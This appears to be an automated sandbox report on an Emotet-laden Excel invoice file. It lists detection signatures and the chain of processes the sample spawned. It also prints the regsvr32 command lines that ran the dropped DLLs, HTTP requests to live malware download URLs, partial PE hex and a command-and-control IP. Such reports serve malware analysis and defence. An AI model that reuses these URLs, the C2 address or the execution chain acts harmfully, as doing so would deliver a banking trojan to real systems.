Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RechnungsDetails.xls

Overview

General Information

Sample Name:RechnungsDetails.xls
Analysis ID:632061
MD5:3264e16e2d21836e4087e76d0943b8b4
SHA1:525547db03f6c255882476ac9b16c305731b4ad1
SHA256:30b599f8110f4a5c63bd656e7fe30a405de553e221c48932aa9eaef5625c3b77
Tags:xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 808 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2688 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2624 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FIdWcB\GulPp.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1136 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2480 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1312 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2360 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2164 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AQbqR\xhDhNsFFy.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.1264915905.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000005.00000002.1264216924.00000000003F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      0000000A.00000002.1346182348.0000000000160000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000009.00000002.1056224873.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000003.00000002.926879685.00000000002C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            3.2.regsvr32.exe.2c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              4.2.regsvr32.exe.140000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                5.2.regsvr32.exe.3f0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  9.2.regsvr32.exe.140000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    3.2.regsvr32.exe.2c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 5 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: RechnungsDetails.xlsVirustotal: Detection: 42%Perma Link
                      Source: RechnungsDetails.xlsReversingLabs: Detection: 36%
                      Source: https://173.82.82.196:8080/URL Reputation: Label: malware
                      Source: https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/Avira URL Cloud: Label: malware
                      Source: http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/Avira URL Cloud: Label: malware
                      Source: http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/URL Reputation: Label: malware
                      Source: https://173.82.82.196/(Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/FAvira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/JAvira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/NAvira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/0Avira URL Cloud: Label: malware
                      Source: jr-software-web.netVirustotal: Detection: 10%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dllMetadefender: Detection: 25%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dllReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dllReversingLabs: Detection: 39%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dllMetadefender: Detection: 37%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dllReversingLabs: Detection: 61%
                      Source: C:\Users\user\uxevr1.ocxReversingLabs: Detection: 39%
                      Source: C:\Users\user\uxevr2.ocxMetadefender: Detection: 37%Perma Link
                      Source: C:\Users\user\uxevr2.ocxReversingLabs: Detection: 61%
                      Source: C:\Users\user\uxevr4.ocxMetadefender: Detection: 25%Perma Link
                      Source: C:\Users\user\uxevr4.ocxReversingLabs: Detection: 65%
                      Source: C:\Windows\System32\AQbqR\xhDhNsFFy.dll (copy)Metadefender: Detection: 25%Perma Link
                      Source: C:\Windows\System32\AQbqR\xhDhNsFFy.dll (copy)ReversingLabs: Detection: 65%
                      Source: C:\Windows\System32\FIdWcB\GulPp.dll (copy)ReversingLabs: Detection: 39%
                      Source: C:\Windows\System32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll (copy)Metadefender: Detection: 37%Perma Link
                      Source: C:\Windows\System32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll (copy)ReversingLabs: Detection: 61%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr1.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr4.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr2.ocxJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 212.98.224.29:443 -> 192.168.2.22:49173 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,10_2_00000001800248B0

                      Software Vulnerabilities

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dll.0.drJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                      Source: global trafficDNS query: name: www.melisetotoaksesuar.com
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 212.98.224.29:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 212.98.224.29:443

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: Joe Sandbox ViewIP Address: 173.82.82.196 173.82.82.196
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:00:00 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:00:00 GMTContent-Disposition: attachment; filename="F3DOS06hLF1rUq3s6XOB.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b30f095562=1653289200; expires=Mon, 23-May-2022 07:01:00 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:00:00 GMTContent-Length: 376320Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea 8c e5 53 ae ed 8b 00 ae ed 8b 00 ae ed 8b 00 c1 9b 15 00 a4 ed 8b 00 c1 9b 21 00 ce ed 8b 00 a7 95 18 00 a9 ed 8b 00 ae ed 8a 00 cb ed 8b 00 c1 9b 20 00 84 ed 8b 00 c1 9b 10 00 af ed 8b 00 c1 9b 11 00 af ed 8b 00 ae ed 1c 00 ac ed 8b 00 c1 9b 16 00 af ed 8b 00 52 69 63 68 ae ed 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c5 a2 86 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 60 01 00 00 82 04 00 00 00 00 00 7c 90 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 90 fc 01 00 72 00 00 00 24 f2 01 00 50 00 00 00 00 70 02 00 98 90 03 00 00 50 02 00 3c 12 00 00 00 00 00 00 00 00 00 00 00 10 06 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 01 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5e 01 00 00 10 00 00 00 60 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 8d 00 00 00 70 01 00 00 8e 00 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 43 00 00 00 00 02 00 00 1c 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 3c 12 00 00 00 50 02 00 00 14 00 00 00 0e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 98 90 03 00 00 70 02 00 00 92 03 00 00 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 08 00 00 00 10 06 00 00 0a 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!Th
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privatePragma: no-cacheContent-Type: application/x-msdownloadExpires: Mon, 23 May 2022 07:00:53 GMTLast-Modified: Mon, 23 May 2022 07:00:53 GMTServer: Microsoft-IIS/8.5Set-Cookie: 628b312600786=1653289253; expires=Mon, 23-May-2022 07:01:53 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="LjSKxP.dll"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETDate: Mon, 23 May 2022 07:00:53 GMTContent-Length: 365056Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: GET /catalog/controller/account/dqfKI/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.melisetotoaksesuar.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /athletics-carnival-2018/3UTZYr9D9f/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: elamurray.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /aaabackupsqldb/11hYk3bHJ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jr-software-web.netConnection: Keep-Alive
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 173.82.82.196:8080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 0000000A.00000002.1346708597.0000000000411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: regsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en)z(0.
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346717284.000000000041A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/
                      Source: regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/(
                      Source: regsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/F
                      Source: regsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/f
